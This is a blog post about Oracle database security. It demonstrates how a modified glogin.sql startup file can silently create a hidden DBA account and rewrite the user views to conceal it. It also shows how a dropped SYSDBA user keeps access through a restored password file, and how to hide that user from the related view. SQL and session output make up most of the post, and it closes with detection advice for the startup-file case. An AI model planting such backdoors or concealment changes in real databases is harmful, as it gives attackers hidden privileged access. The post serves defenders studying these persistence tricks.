Yaping's Weblog

September 2, 2008

Startup Files

Filed under: Oracle — Yaping @ 2:30 am
Tags:

There’re some SQL command files which will be executed when users logon db, such as glogin.sql/login.sql on SQL*Plus, toad.ini on TOAD. The cracker can modify these files and add some statements to create user, escalate privileges, change data, and so on. Illuminate through the following demo.

Modify glogin.sql file, add the following statements. It has two purposes: create one user with dba privilege; recreate view dba_users & all_users, hide this user through query these views.

set term off
create user cracker identified by cracker;
grant dba to cracker;
  CREATE OR REPLACE FORCE VIEW “SYS”.”ALL_USERS” (”NAME”, “USER#”, “CTIME”) AS
… …
  and u.name != ‘CRACKER’;
CREATE OR REPLACE FORCE VIEW “SYS”.”DBA_USERS” (”USERNAME”, “USER_ID”, “PASSWORD”, “ACCOUNT_STATUS”, “LOCK_DATE”, “EXPIRY_DATE”, “DEFAULT_TABLESPACE”, “TEMPORARY_TABLESPACE”, “CREATED”, “PROFILE”, “INITIAL_RSRC_CONSUMER_GROUP”, “EXTERNAL_NAME”) AS
  … …
       and u.name != ‘CRACKER’;
set term on

Then logon db with sys user.

[oracle@chen admin]$ sqlplus
SQL*Plus: Release 9.2.0.4.0 – Production on Thu Jan 10 11:07:06 2008
Copyright (c) 1982, 2002, Oracle Corporation.  All rights reserved.
Enter user-name: /as sysdba
Connected to:
Oracle9i Enterprise Edition Release 9.2.0.4.0 – Production
With the Partitioning, OLAP and Oracle Data Mining options
JServer Release 9.2.0.4.0 – Production
sys@CHEN>select name from all_users;
NAME
——————————
SYS
SYSTEM
OUTLN
DBSNMP
TEST
YP
6 rows selected.

sys@CHEN>select username from dba_users;
USERNAME
——————————
SYS
SYSTEM
OUTLN
DBSNMP
TEST
YP
6 rows selected.

sys@CHEN>conn cracker/cracker
Connected.
sys@CHEN>select name from sys.user$ where TYPE#<>0 minus select username from dba_users;
NAME
——————————
CRACKER

Recommends
1.       Check glogin.sql/login.sql/toad.ini files for modification;
2.       Check search sequence SQLPATH;
3.       If possible use SQL*Plus <10g because the (g)login.sql is only executed during the firstly login;
4.       Use /nolog as SQL*Plus startup parameter, (g)login.sql is not executed with SQL*Plus <10g.
5.       Use OS tools to track these files changed, such as md5sum/sha1sum in Linux.

 

Orapw file issue

sys@CHEN>create user hacker identified by hacker;
User created.
sys@CHEN>grant sysdba to hacker;
Grant succeeded.

[admin@chen ~]$ sqlplus “hacker/hacker@chen as sysdba”
SQL*Plus: Release 9.2.0.8.0 – Production on Tue Mar 4 22:24:22 2008
Copyright (c) 1982, 2002, Oracle Corporation.  All rights reserved.
Connected to:
Oracle9i Enterprise Edition Release 9.2.0.4.0 – Production
With the Partitioning, OLAP and Oracle Data Mining options
JServer Release 9.2.0.4.0 – Production
sys@CHEN>

sys@CHEN>!cp /opt/app/oracle/product/9.2.0/dbs/orapwchen /opt/app/oracle/product/9.2.0/dbs/orapwchen.org

sys@CHEN>drop user hacker;
User dropped.

sys@CHEN>!cp /opt/app/oracle/product/9.2.0/dbs/orapwchen.org /opt/app/oracle/product/9.2.0/dbs/orapwchen

sys@CHEN>select name from user$ where type#<>0;
NAME
——————————
SYS
SYSTEM
OUTLN
DBSNMP
TEST
YP
6 rows selected.
sys@CHEN>select * from v$pwfile_users;
USERNAME                       SYSDB SYSOP
—————————— —– —–
SYS                            TRUE  TRUE
HACKER                         TRUE  FALSE
sys@CHEN>select VIEW_DEFINITION from  v$fixed_view_definition where VIEW_NAME=’GV$PWFILE_USERS’;
VIEW_DEFINITION
——————————————————————————————————————————————————
select inst_id,username,decode(sysdba,1,’TRUE’,’FALSE’),  decode(sysoper,1,’TRUE’,’FALSE’) from x$kzsrt where valid=1  and username != ‘INTERNAL’

[admin@chen ~]$ sqlplus “hacker/hacker@chen as sysdba”
SQL*Plus: Release 9.2.0.8.0 – Production on Tue Mar 4 22:27:19 2008
Copyright (c) 1982, 2002, Oracle Corporation.  All rights reserved.
Connected to:
Oracle9i Enterprise Edition Release 9.2.0.4.0 – Production
With the Partitioning, OLAP and Oracle Data Mining options
JServer Release 9.2.0.4.0 – Production
sys@CHEN>

Even though the user HACKER was dropped in the db, it still can logon as SYSDBA if it exists in orapw file. We still can hide the user in gv$pwfile_profiles if change its definition to the following statement which is hard-coded in binary file oracle.

select inst_id,username,decode(sysdba,1,’TRUE’,’FALSE’),  decode(sysoper,1,’TRUE’,’FALSE’) from x$kzsrt where username not in (’INTERNAL’,’HACKER’)

Advertisements

Leave a Comment »

No comments yet.

RSS feed for comments on this post. TrackBack URI

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

Create a free website or blog at WordPress.com.

%d bloggers like this: